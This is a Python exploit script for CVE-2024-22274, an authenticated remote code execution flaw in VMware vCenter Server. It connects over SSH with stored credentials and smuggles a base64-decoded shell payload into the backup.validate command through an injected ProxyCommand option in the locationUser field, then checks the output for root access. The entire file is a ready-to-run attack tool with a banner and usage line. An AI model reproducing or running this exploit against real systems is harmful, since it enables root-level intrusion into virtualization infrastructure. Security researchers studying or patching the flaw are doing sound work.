import base64
import argparse
from fabric import Connection
from colorama import Fore, Style, init

init(autoreset=True)

def ssh_credentials(config_file):
    """Grab the username and password from vcenter_creds.txt"""
    credentials = {}
    with open(config_file, 'r') as file:
        for line in file:
            key, value = line.strip().split('=', 1)
            credentials[key] = value
    return credentials

def exploit(host, port, payload_path, credentials):
    """Please read and review the script before running this tool to avoid errors"""
    try:
        with open(payload_path, 'r') as file:
            payload_encoded = file.read().strip()
        
        decode_payload = base64.b64decode(payload_encoded).decode()

        # VMware vCenter command 
        payload_command = f"""
        backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=/bin/bash -c "echo {decode_payload} | base64 -d | bash"' --locationPassword
        """
        
        username = credentials.get('username')
        password = credentials.get('password')

        if not username or not password:
            raise ValueError(f"{Fore.LIGHTYELLOW_EX}Username or password not found in configuration file.{Style.RESET_ALL}")

        conn = Connection(
            host=host,
            port=port,
            user=username,
            connect_kwargs={"password": password}
        )
        print(f"{Fore.LIGHTGREEN_EX}[+] Connected to {Fore.LIGHTWHITE_EX}{host} via SSH{Style.RESET_ALL}")

        result = conn.run(payload_command, hide=True)
        print(f"{Fore.LIGHTGREEN_EX}[+] Payload executed successfully.{Fore.LIGHTWHITE_EX} Output: {result.stdout}{Style.RESET_ALL}")

        if "root" in result.stdout.lower() or "uid=0" in result.stdout.lower():
            print(f"{Fore.LIGHTGREEN_EX}[+] Exploitation successful: You have root access.{Style.RESET_ALL}")
        else:
            print(f"{Fore.LIGHTRED_EX}[+] Exploitation failed: Root access not obtained.{Style.RESET_ALL}")

        print(f"{Fore.LIGHTBLUE_EX}[+] Finished executing commands on {host}{Style.RESET_ALL}")

    except Exception as ex:
        print(f"{Fore.LIGHTRED_EX}[-] Error: {ex}{Style.RESET_ALL}")

def main():
    """Parse arguments and run the exploit function."""
    banner = f"""{Fore.LIGHTGREEN_EX}
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
{Style.RESET_ALL}"""
    parser = argparse.ArgumentParser(
        description="Privileges Escalation: Authenticated Remote Code Execution in VMware vCenter Server",
        epilog=f"{Fore.LIGHTGREEN_EX}Exploit usage: python3 CVE-2024-22274-RCE.py -t 192.168.1.100 -P 22 -p payload.txt -c vCenter_creds.txt{Style.RESET_ALL}"
    )
    print(banner)
    parser.add_argument('-t', '--target', required=True, help="Target Host address to connect to")
    parser.add_argument('-P', '--port', type=int, default=22, help="Port number (default: 22)")
    parser.add_argument('-p', '--payload', required=True, help="File containing the base64-encoded payload")
    parser.add_argument('-c', '--config', default='vCenter_creds.txt', help="File containing SSH credentials (default: vCenter_creds.txt)")

    args = parser.parse_args()

    credentials = ssh_credentials(args.config)
    exploit(
        host=args.target,
        port=args.port,
        payload_path=args.payload,
        credentials=credentials
    )

if __name__ == "__main__":
    main()